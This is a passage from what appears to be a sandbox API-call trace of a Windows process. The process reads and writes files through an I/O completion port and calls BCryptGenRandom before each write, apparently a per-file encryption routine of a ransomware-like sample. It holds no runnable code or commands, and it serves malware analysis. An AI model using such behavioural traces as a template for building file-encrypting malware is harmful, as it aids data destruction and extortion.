(_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.188] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.188] free (_Block=0x2071c20) [0112.188] free (_Block=0x2071d30) [0112.188] free (_Block=0x77d8b0) [0112.188] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.189] CloseHandle (hObject=0x344) returned 1 [0112.191] free (_Block=0x3e70008) [0112.191] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.191] CloseHandle (hObject=0x3bc) returned 1 [0112.192] free (_Block=0x3ef0008) [0112.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0112.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0112.391] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.391] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.391] free (_Block=0x77d7a8) [0112.391] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.392] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.400] free (_Block=0x2071c20) [0112.400] free (_Block=0x2071d30) [0112.400] free (_Block=0x77d8b0) [0112.400] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0112.409] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.490] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.491] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.528] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.577] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.603] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.603] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.615] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x964, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0112.615] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.629] ReadFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x804, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0112.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.646] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x8b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0112.647] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0112.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0112.665] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.665] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.665] free (_Block=0x77d7a8) [0112.665] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.665] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.665] free (_Block=0x2071c20) [0112.665] free (_Block=0x2071d30) [0112.665] free (_Block=0x77d8b0) [0112.666] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.666] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.678] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.678] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0112.678] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.679] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0112.679] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.679] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.679] free (_Block=0x77d7a8) [0112.680] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.680] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.680] free (_Block=0x2071c20) [0112.680] free (_Block=0x2071d30) [0112.680] free (_Block=0x77d8b0) [0112.680] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0112.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0112.691] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.691] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0112.691] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.692] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0112.692] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.692] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.692] free (_Block=0x77d7a8) [0112.692] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.692] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.693] free (_Block=0x2071c20) [0112.693] free (_Block=0x2071d30) [0112.693] free (_Block=0x77d8b0) [0112.693] WriteFile (in: hFile=0x340, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.693] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.239] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0113.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0113.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0113.250] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.250] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.250] free (_Block=0x77d7a8) [0113.250] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.250] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.250] free (_Block=0x2071c20) [0113.250] free (_Block=0x2071d30) [0113.250] free (_Block=0x77d8b0) [0113.250] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0113.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.254] CloseHandle (hObject=0x2f4) returned 1 [0113.256] free (_Block=0x1ff1e60) [0113.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0113.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0113.280] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.280] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.280] free (_Block=0x77d7a8) [0113.280] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.280] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.281] free (_Block=0x2071c20) [0113.281] free (_Block=0x2071d30) [0113.281] free (_Block=0x77d8b0) [0113.281] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0113.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.286] CloseHandle (hObject=0x3bc) returned 1 [0113.289] free (_Block=0x3ef0008) [0113.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.301] CloseHandle (hObject=0x81c) returned 1 [0113.302] free (_Block=0x3d70450) [0113.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.314] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x384, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.314] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.325] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x9dc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0113.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.330] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x914, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.382] ReadFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x4a7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0113.391] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.399] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.399] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.412] CloseHandle (hObject=0x2f4) returned 1 [0113.414] free (_Block=0x3e70008) [0113.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.425] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.425] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0113.425] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.425] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0113.426] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.426] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.426] free (_Block=0x77d7a8) [0113.426] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.426] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.426] free (_Block=0x2071c20) [0113.426] free (_Block=0x2071d30) [0113.426] free (_Block=0x77d8b0) [0113.426] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.432] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0113.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.442] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xcb4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.453] CloseHandle (hObject=0x2f4) returned 1 [0113.461] free (_Block=0x3d70450) [0113.461] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0113.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.477] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0113.477] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.477] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.477] free (_Block=0x77d7a8) [0113.477] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.477] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.478] free (_Block=0x2071c20) [0113.478] free (_Block=0x2071d30) [0113.478] free (_Block=0x77d8b0) [0113.478] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.478] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.485] CloseHandle (hObject=0x13c0) returned 1 [0113.486] free (_Block=0x3db04c0) [0113.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.493] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x32f2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.512] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0113.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0113.946] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x7220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0113.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, 